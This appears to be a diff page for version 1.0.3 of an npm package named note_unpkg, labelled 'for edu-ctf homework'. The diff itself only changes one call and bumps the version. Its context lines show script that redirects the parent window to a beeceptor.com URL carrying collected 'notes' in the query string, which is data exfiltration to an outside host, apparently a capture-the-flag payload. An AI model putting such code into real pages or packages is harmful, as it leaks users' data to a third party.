note_unpkg 1.0.2 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -13,4 +13,4 @@ async function go() {
13
13
  await new Promise(r => setTimeout(r, 2000));
14
14
  window.parent.location = "https://o4o55555.free.beeceptor.com?q=" + notes
15
15
  };
16
- await go();
16
+ go();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note_unpkg",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "for edu-ctf homework",
5
5
  "main": "index.js",
6
6
  "scripts": {